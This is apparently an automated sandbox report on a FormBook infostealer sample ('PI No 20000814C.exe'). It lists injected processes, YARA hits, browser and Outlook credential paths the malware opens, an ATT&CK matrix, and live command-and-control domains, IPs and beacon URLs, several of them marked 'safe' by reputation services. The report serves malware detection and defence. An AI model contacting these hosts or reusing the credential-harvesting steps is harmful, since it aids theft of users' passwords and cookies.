            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F581F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00F581F7
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F64C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00F64C03
            Source: PI No 20000814C.exe, 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: YoOsbbockoYKKBpRowW.exe, 00000003.00000002.4524431579.00000000013E0000.00000002.00000001.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000003.00000000.2145129232.00000000013E1000.00000002.00000001.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4524923976.0000000001480000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: IProgram Manager
            Source: PI No 20000814C.exe, YoOsbbockoYKKBpRowW.exe, 00000003.00000002.4524431579.00000000013E0000.00000002.00000001.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000003.00000000.2145129232.00000000013E1000.00000002.00000001.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4524923976.0000000001480000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: YoOsbbockoYKKBpRowW.exe, 00000003.00000002.4524431579.00000000013E0000.00000002.00000001.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000003.00000000.2145129232.00000000013E1000.00000002.00000001.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4524923976.0000000001480000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: YoOsbbockoYKKBpRowW.exe, 00000003.00000002.4524431579.00000000013E0000.00000002.00000001.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000003.00000000.2145129232.00000000013E1000.00000002.00000001.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4524923976.0000000001480000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F2886B cpuid 0_2_00F2886B
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F350D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00F350D7
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F42230 GetUserNameW,0_2_00F42230
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F3418A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00F3418A
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F04AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00F04AFE

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.470000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.470000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.4527764176.0000000005230000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2228247758.0000000000470000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4525395645.0000000004FC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4518364986.00000000032B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4525512009.0000000005000000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4525518993.0000000003490000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2228534862.0000000002CE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2229293264.0000000004000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\cipher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\cipher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\cipher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\cipher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\cipher.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\cipher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\cipher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\cipher.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\cipher.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
            Source: PI No 20000814C.exeBinary or memory string: WIN_81
            Source: PI No 20000814C.exeBinary or memory string: WIN_XP
            Source: PI No 20000814C.exeBinary or memory string: WIN_XPe
            Source: PI No 20000814C.exeBinary or memory string: WIN_VISTA
            Source: PI No 20000814C.exeBinary or memory string: WIN_7
            Source: PI No 20000814C.exeBinary or memory string: WIN_8
            Source: PI No 20000814C.exe, 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.470000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.470000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.4527764176.0000000005230000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2228247758.0000000000470000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4525395645.0000000004FC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4518364986.00000000032B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4525512009.0000000005000000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4525518993.0000000003490000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2228534862.0000000002CE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2229293264.0000000004000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F76596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00F76596
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F76A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00F76A5A

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure2
            Valid Accounts            		2
            Native API            		1
            DLL Side-Loading            		1
            Exploitation for Privilege Escalation            		1
            Disable or Modify Tools            		1
            OS Credential Dumping            		2
            System Time Discovery            		Remote Services1
            Archive Collected Data            		4
            Ingress Tool Transfer            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/Job2
            Valid Accounts            		1
            Abuse Elevation Control Mechanism            		1
            Deobfuscate/Decode Files or Information            		21
            Input Capture            		1
            Account Discovery            		Remote Desktop Protocol1
            Data from Local System            		1
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		Security Account Manager2
            File and Directory Discovery            		SMB/Windows Admin Shares1
            Email Collection            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
            Valid Accounts            		31
            Obfuscated Files or Information            		NTDS16
            System Information Discovery            		Distributed Component Object Model21
            Input Capture            		4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
            Access Token Manipulation            		1
            Software Packing            		LSA Secrets51
            Security Software Discovery            		SSH3
            Clipboard Data            		Fallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
            Process Injection            		1
            DLL Side-Loading            		Cached Domain Credentials2
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
            Valid Accounts            		DCSync3
            Process Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
            Virtualization/Sandbox Evasion            		Proc Filesystem11
            Application Window Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
            Access Token Manipulation            		/etc/passwd and /etc/shadow1
            System Owner/User Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron412
            Process Injection            		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1446508 Sample: PI No 20000814C.exe Startdate: 23/05/2024 Architecture: WINDOWS Score: 100 28 www.autonomyai.xyz 2->28 30 www.upshercode.store 2->30 32 21 other IPs or domains 2->32 42 Snort IDS alert for network traffic 2->42 44 Malicious sample detected (through community Yara rule) 2->44 46 Multi AV Scanner detection for submitted file 2->46 50 4 other signatures 2->50 10 PI No 20000814C.exe 4 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 28->48 process4 signatures5 62 Binary is likely a compiled AutoIt script file 10->62 64 Writes to foreign memory regions 10->64 66 Maps a DLL or memory area into another process 10->66 13 svchost.exe 10->13         started        process6 signatures7 68 Maps a DLL or memory area into another process 13->68 16 YoOsbbockoYKKBpRowW.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 cipher.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 2 other signatures 19->58 22 YoOsbbockoYKKBpRowW.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.anoldshow.top 203.161.43.228, 49723, 49724, 49725 VNPT-AS-VNVNPTCorpVN Malaysia 22->34 36 upshercode.store 162.240.81.18, 49706, 49707, 49708 UNIFIEDLAYER-AS-1US United States 22->36 38 11 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            PI No 20000814C.exe41%VirustotalBrowse
            PI No 20000814C.exe39%ReversingLabsWin32.Trojan.ShellcodeCrypter
            PI No 20000814C.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            www.botcsllc.com0%VirustotalBrowse
            www.brzuszkiewicz.pl0%VirustotalBrowse
            upshercode.store0%VirustotalBrowse
            www.fruitique.co.uk1%VirustotalBrowse
            autonomyai.xyz1%VirustotalBrowse
            szandraromanovics.hu0%VirustotalBrowse
            isrninjas.com0%VirustotalBrowse
            www.autonomyai.xyz2%VirustotalBrowse
            emgeecontracting.shop1%VirustotalBrowse
            www.emgeecontracting.shop0%VirustotalBrowse
            www.badcopsinyourtown.info1%VirustotalBrowse
            www.darkerberrycoffee.com0%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
            https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
            http://www.kubanci.ru/3nn5/0%Avira URL Cloudsafe
            https://twitter.com/hover0%Avira URL Cloudsafe
            http://www.darkerberrycoffee.com/q801/0%Avira URL Cloudsafe
            https://www.instagram.com/hover_domains0%Avira URL Cloudsafe
            https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
            https://www.fruitique.co.uk/2oa4/?zdK0d=M8mTZ0xHNd1dPVm&FNPd=i5qj3MbwnaqqZlaCzV8lkcyXWM7z5OtwAvMYuHy0%Avira URL Cloudsafe
            http://www.darkerberrycoffee.com/q801/0%VirustotalBrowse
            http://www.novosti-dubai.ru/pczf/?FNPd=vvhIsGWCPluUUYKozwujHRnpBsxhc4873MKwq9aQfmKEHTaouY4bbLMkzLN1D0yMYwsFeTDzET5UctfaR3GvIGUh8HX7yBNnSQfVfxhBU4FjPt5zEeZpSpbIsG6X42DlnYxUoU4=&zdK0d=M8mTZ0xHNd1dPVm0%Avira URL Cloudsafe
            https://www.instagram.com/hover_domains0%VirustotalBrowse
            https://duckduckgo.com/chrome_newtab0%VirustotalBrowse
            http://www.isrninjas.com/klk7/0%Avira URL Cloudsafe
            https://duckduckgo.com/ac/?q=0%VirustotalBrowse
            http://www.badcopsinyourtown.info/vucc/0%Avira URL Cloudsafe
            http://www.ilodezu.com/z48v/0%Avira URL Cloudsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
            http://www.szandraromanovics.hu/xaki/0%Avira URL Cloudsafe
            http://www.szandraromanovics.hu/xaki/?FNPd=wRLBEujJd4B1pnn0jgbcCD9yzLi5n0gWQHliinLShRQwSVs5kwR/9Eag334lnRUYK0hhQTyk4agd1D3QGuL+jgjAjqkpdV5oyMSY0wmC42s9caEZ6Np2ARJau1ITEDyDk07yXfw=&zdK0d=M8mTZ0xHNd1dPVm0%Avira URL Cloudsafe
            http://www.featurasandals.com/tqo3/0%Avira URL Cloudsafe
            http://www.kubanci.ru/3nn5/?FNPd=4XBe2xrQoWjnswKLKDm2mj9gze7KON4v3N+j4TaEXCiYldMk5+wT4RAjeLUuWdfkxSJYkkjl9YjcDipJ/nGSZTJn94UV3fFhn0eiHqMCH7NwlCC8Ww2FTOTnO/H4b47QggKeMo0=&zdK0d=M8mTZ0xHNd1dPVm0%Avira URL Cloudsafe
            http://www.isrninjas.com0%Avira URL Cloudsafe
            http://www.fruitique.co.uk/2oa4/0%Avira URL Cloudsafe
            http://www.badcopsinyourtown.info/vucc/?FNPd=spJMClAwzf8Vr4tU/CNFMIwartImjnuX45nH0e+a/t8mnJgptjgbw3tj3ejIJ/FML5FH3w7kVV5/X9kg+3gEfjxhkZ7ZkTpqlYFj4xEsGEUQd8yZWQ8UdxmAeS1YmrNTPUkJX5Q=&zdK0d=M8mTZ0xHNd1dPVm0%Avira URL Cloudsafe
            http://www.darkerberrycoffee.com/q801/?FNPd=k3+C/Hz11l7GGMbtyaJwFwJpJMDKB1ezXvCBEwQvFs9JnbfCVR4CFb+wnQ6+1xhwjegmGkdUp41mNGCOeWSxR+T+a6juW6LhjpcRfEd8pWKsVNJFlAS3Jblwp/Y5eAdaUUcSoKM=&zdK0d=M8mTZ0xHNd1dPVm0%Avira URL Cloudsafe
            http://www.fruitique.co.uk/2oa4/?zdK0d=M8mTZ0xHNd1dPVm&FNPd=i5qj3MbwnaqqZlaCzV8lkcyXWM7z5OtwAvMYuHy+Rs8D5dDCYTlmhW0rahL5OEPHZ4qZwnhHQRjdmYMWg8iT8fZssjRHm0dm/kqluwDPMT77mKIBha7fxwQW4MO+4PevzRBPSWs=0%Avira URL Cloudsafe
            https://t2837.am-track.pl/redir.php?panel=Market_Listing&params=id%3D3940392%26utm_source%3Dmarket_r0%Avira URL Cloudsafe
            http://nginx.net/0%Avira URL Cloudsafe
            http://www.autonomyai.xyz/nvvv/?FNPd=JDodjlWkk0lcNcT9zM0S24FlsQS/eMqacQTVuCL7j+UnSXfTOV7xNk/UDiJqL4CQ9wwpEirhIcb8jwYA7Bo2HvZQNtTCLCENCF3b65oF2QxnolO6iVWtqwVopt5Qqv0FYMJ/2e8=&zdK0d=M8mTZ0xHNd1dPVm0%Avira URL Cloudsafe
            https://www.hover.com/domains/results0%Avira URL Cloudsafe
            http://fedoraproject.org/0%Avira URL Cloudsafe
            http://www.anoldshow.top/ii3e/0%Avira URL Cloudsafe
            http://www.ilodezu.com/z48v/?FNPd=V7EBmqWgiCvSgvqad7SyaCOgC+e4BvQG3ktlhx6lo/cZrGqdjKlpWUio9FOhJOaxZOVNIG538/ROKaWARcsTTcMUAhKYPtR70XL2Xhx4NmC7fpbV6q2t8I9SMzcLGlFD+PeBXEg=&zdK0d=M8mTZ0xHNd1dPVm0%Avira URL Cloudsafe
            http://www.brzuszkiewicz.pl/xf32/0%Avira URL Cloudsafe
            http://www.novosti-dubai.ru/pczf/0%Avira URL Cloudsafe
            http://www.botcsllc.com/qukz/0%Avira URL Cloudsafe
            https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css0%Avira URL Cloudsafe
            http://www.botcsllc.com/qukz/?FNPd=2j86s8NJ5fDu8DdyaluKTyyQGpxO5RQn4ZQP4QlLq4dDbMhIcvPH81QwZFWQYfauPSKzeNxy1T+ygqRogiCCubiSHCzeY+ai+VGnS0fEikTej8/T0yfRDQzRtbWcxq7BJieL0EY=&zdK0d=M8mTZ0xHNd1dPVm0%Avira URL Cloudsafe
            http://www.emgeecontracting.shop/88o1/?FNPd=6H0XwdryOyxEld2In19mTcPbDWu4JiPerPnhtxRIRMEZrjEQVkxwg3m1x0TM7/jCK+5wA6bK2pnso5xUF2TOd/2As6zlvvV262DB5DqMTNUdTxWj14lc65WjVUDEbYoF5Wnps5M=&zdK0d=M8mTZ0xHNd1dPVm0%Avira URL Cloudsafe
            http://www.autonomyai.xyz/nvvv/0%Avira URL Cloudsafe
            http://kubanci.ru/3nn5/?FNPd=4XBe2xrQoWjnswKLKDm2mj9gze7KON4v3N0%Avira URL Cloudsafe
            http://www.upshercode.store/x98j/0%Avira URL Cloudsafe
            http://www.dvizhenie-pallet.ru/t96c/?zdK0d=M8mTZ0xHNd1dPVm&FNPd=4HeJ9NLv0sXxrw0DzDAC1WoSlNK9MN8e7k2kqtvkuL0qZpE735Fp+TMdSC/xJF1XoX+msXZD9KWOaF8gkpoi/zU8Ecilk3SCpDE4oxEYJqxSeKyI7QDD26ritGREhwxOgv5PBbM=0%Avira URL Cloudsafe
            http://www.anoldshow.top/ii3e/?FNPd=gUffmmgf+j+eonfXGycQzt8ao2VHtB63wMQRmDLG69g3nf5Br3Vvevf8g6YjJ3DFTJ0p8mRaN1UTMPOwjNToF+SwMNbt6WzMyov1r5SS6GyZoHVOyxmtZVBap1MoFQhjNwOQqL8=&zdK0d=M8mTZ0xHNd1dPVm0%Avira URL Cloudsafe
            http://www.dvizhenie-pallet.ru/t96c/0%Avira URL Cloudsafe
            http://www.isrninjas.com/klk7/?FNPd=9dP0BDeQOeIgUtwHisb4+HhriuuC7aFbTiKeAEdqL4fJM7qIcfT3xserNr/6IBhXmDc0Se+gIKMrWWn6otGBJpYMdUchDVG2Mcac25kobj2gW5aJo9JvfS7IA0chOZVsE0AwxR4=&zdK0d=M8mTZ0xHNd1dPVm0%Avira URL Cloudsafe
            http://novosti-dubai.ru/pczf/?FNPd=vvhIsGWCPluUUYKozwujHRnpBsxhc4873MKwq9aQfmKEHTaouY4bbLMkzLN1D0yMY0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.botcsllc.com
            		216.40.34.41
            		truetrueunknown
            darkerberrycoffee.com
            		3.33.130.190
            		truetrue
              		unknown
              www.brzuszkiewicz.pl
              		185.253.212.22
              		truetrueunknown
              www.ilodezu.com
              		188.114.96.3
              		truetrue
                		unknown
                upshercode.store
                		162.240.81.18
                		truetrueunknown
                www.fruitique.co.uk
                		212.227.172.253
                		truetrueunknown
                autonomyai.xyz
                		3.33.130.190
                		truetrueunknown
                www.featurasandals.com
                		104.21.28.203
                		truetrue
                  		unknown
                  www.novosti-dubai.ru
                  		87.236.16.214
                  		truetrue
                    		unknown
                    isrninjas.com
                    		3.33.130.190
                    		truetrueunknown
                    www.dvizhenie-pallet.ru
                    		5.101.153.149
                    		truetrue
                      		unknown
                      szandraromanovics.hu
                      		92.118.24.161
                      		truetrueunknown
                      www.anoldshow.top
                      		203.161.43.228
                      		truetrue
                        		unknown
                        badcopsinyourtown.info
                        		3.33.130.190
                        		truetrue
                          		unknown
                          www.kubanci.ru
                          		194.58.112.174
                          		truetrue
                            		unknown
                            emgeecontracting.shop
                            		69.57.162.24
                            		truetrueunknown
                            www.autonomyai.xyz
                            		unknown
                            		unknowntrueunknown
                            www.darkerberrycoffee.com
                            		unknown
                            		unknowntrueunknown
                            www.upshercode.store
                            		unknown
                            		unknowntrue
                              		unknown
                              www.isrninjas.com
                              		unknown
                              		unknowntrue
                                		unknown
                                www.emgeecontracting.shop
                                		unknown
                                		unknowntrueunknown
                                www.szandraromanovics.hu
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.badcopsinyourtown.info
                                  		unknown
                                  		unknowntrueunknown

                                  Contacted URLs

                                  NameMaliciousAntivirus DetectionReputation
                                  http://www.kubanci.ru/3nn5/true
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.darkerberrycoffee.com/q801/true
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.novosti-dubai.ru/pczf/?FNPd=vvhIsGWCPluUUYKozwujHRnpBsxhc4873MKwq9aQfmKEHTaouY4bbLMkzLN1D0yMYwsFeTDzET5UctfaR3GvIGUh8HX7yBNnSQfVfxhBU4FjPt5zEeZpSpbIsG6X42DlnYxUoU4=&zdK0d=M8mTZ0xHNd1dPVmtrue
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.isrninjas.com/klk7/true
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.badcopsinyourtown.info/vucc/true
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.ilodezu.com/z48v/true
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.szandraromanovics.hu/xaki/true
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.szandraromanovics.hu/xaki/?FNPd=wRLBEujJd4B1pnn0jgbcCD9yzLi5n0gWQHliinLShRQwSVs5kwR/9Eag334lnRUYK0hhQTyk4agd1D3QGuL+jgjAjqkpdV5oyMSY0wmC42s9caEZ6Np2ARJau1ITEDyDk07yXfw=&zdK0d=M8mTZ0xHNd1dPVmtrue
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.kubanci.ru/3nn5/?FNPd=4XBe2xrQoWjnswKLKDm2mj9gze7KON4v3N+j4TaEXCiYldMk5+wT4RAjeLUuWdfkxSJYkkjl9YjcDipJ/nGSZTJn94UV3fFhn0eiHqMCH7NwlCC8Ww2FTOTnO/H4b47QggKeMo0=&zdK0d=M8mTZ0xHNd1dPVmtrue
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.fruitique.co.uk/2oa4/true
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.featurasandals.com/tqo3/true
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.badcopsinyourtown.info/vucc/?FNPd=spJMClAwzf8Vr4tU/CNFMIwartImjnuX45nH0e+a/t8mnJgptjgbw3tj3ejIJ/FML5FH3w7kVV5/X9kg+3gEfjxhkZ7ZkTpqlYFj4xEsGEUQd8yZWQ8UdxmAeS1YmrNTPUkJX5Q=&zdK0d=M8mTZ0xHNd1dPVmtrue
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.darkerberrycoffee.com/q801/?FNPd=k3+C/Hz11l7GGMbtyaJwFwJpJMDKB1ezXvCBEwQvFs9JnbfCVR4CFb+wnQ6+1xhwjegmGkdUp41mNGCOeWSxR+T+a6juW6LhjpcRfEd8pWKsVNJFlAS3Jblwp/Y5eAdaUUcSoKM=&zdK0d=M8mTZ0xHNd1dPVmtrue
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.fruitique.co.uk/2oa4/?zdK0d=M8mTZ0xHNd1dPVm&FNPd=i5qj3MbwnaqqZlaCzV8lkcyXWM7z5OtwAvMYuHy+Rs8D5dDCYTlmhW0rahL5OEPHZ4qZwnhHQRjdmYMWg8iT8fZssjRHm0dm/kqluwDPMT77mKIBha7fxwQW4MO+4PevzRBPSWs=true
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.autonomyai.xyz/nvvv/?FNPd=JDodjlWkk0lcNcT9zM0S24FlsQS/eMqacQTVuCL7j+UnSXfTOV7xNk/UDiJqL4CQ9wwpEirhIcb8jwYA7Bo2HvZQNtTCLCENCF3b65oF2QxnolO6iVWtqwVopt5Qqv0FYMJ/2e8=&zdK0d=M8mTZ0xHNd1dPVmtrue
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.anoldshow.top/ii3e/true
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.ilodezu.com/z48v/?FNPd=V7EBmqWgiCvSgvqad7SyaCOgC+e4BvQG3ktlhx6lo/cZrGqdjKlpWUio9FOhJOaxZOVNIG538/ROKaWARcsTTcMUAhKYPtR70XL2Xhx4NmC7fpbV6q2t8I9SMzcLGlFD+PeBXEg=&zdK0d=M8mTZ0xHNd1dPVmtrue
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.brzuszkiewicz.pl/xf32/true
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.novosti-dubai.ru/pczf/true
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.botcsllc.com/qukz/true
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.botcsllc.com/qukz/?FNPd=2j86s8NJ5fDu8DdyaluKTyyQGpxO5RQn4ZQP4QlLq4dDbMhIcvPH81QwZFWQYfauPSKzeNxy1T+ygqRogiCCubiSHCzeY+ai+VGnS0fEikTej8/T0yfRDQzRtbWcxq7BJieL0EY=&zdK0d=M8mTZ0xHNd1dPVmtrue
                                  • Avira URL Cloud: safe
                                  		unknown
